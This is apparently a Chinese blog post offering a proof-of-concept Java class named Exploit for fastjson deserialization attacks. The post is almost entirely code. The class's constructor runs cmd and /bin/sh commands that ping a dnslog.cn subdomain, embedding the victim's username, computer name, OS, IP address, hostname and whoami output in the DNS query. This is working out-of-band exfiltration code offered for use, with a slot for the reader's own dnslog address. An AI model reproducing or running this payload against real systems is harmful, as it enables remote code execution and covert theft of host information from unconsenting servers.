fastjson ping外带信息poc

public class Exploit {
    public Exploit(){
        String base_url = ".egpkd5.dnslog.cn"; //你的dnslog地址
        String win_dnslog = "windows" + base_url;
        // windows
        try{
            String[] commands = { "cmd", "/c", "ping username.%username%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping computername.%computername%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "cmd", "/c", "ping os.%os%." + win_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        
        
        // linux
        String linux_dnslog = "linux" + base_url;
        try{

            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk -F: '{print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping ip.`ifconfig eth0|grep 'inet '|awk '{ print $2}'|awk '{ gsub(/\\./,\"-\"); print $0 }'`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping hostname.`cat /proc/sys/kernel/hostname`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
        try{
            String[] commands = { "/bin/sh", "-c", "ping user.`whoami`." + linux_dnslog};
            Runtime.getRuntime().exec(commands);
        }catch(Exception e){
            // e.printStackTrace();
        }
    }
    public static void main(String[] args){
        Exploit e = new Exploit();
    }
}
上一篇:json注解及序列化


下一篇:FastJson中的ObjectMapper对象的使用详解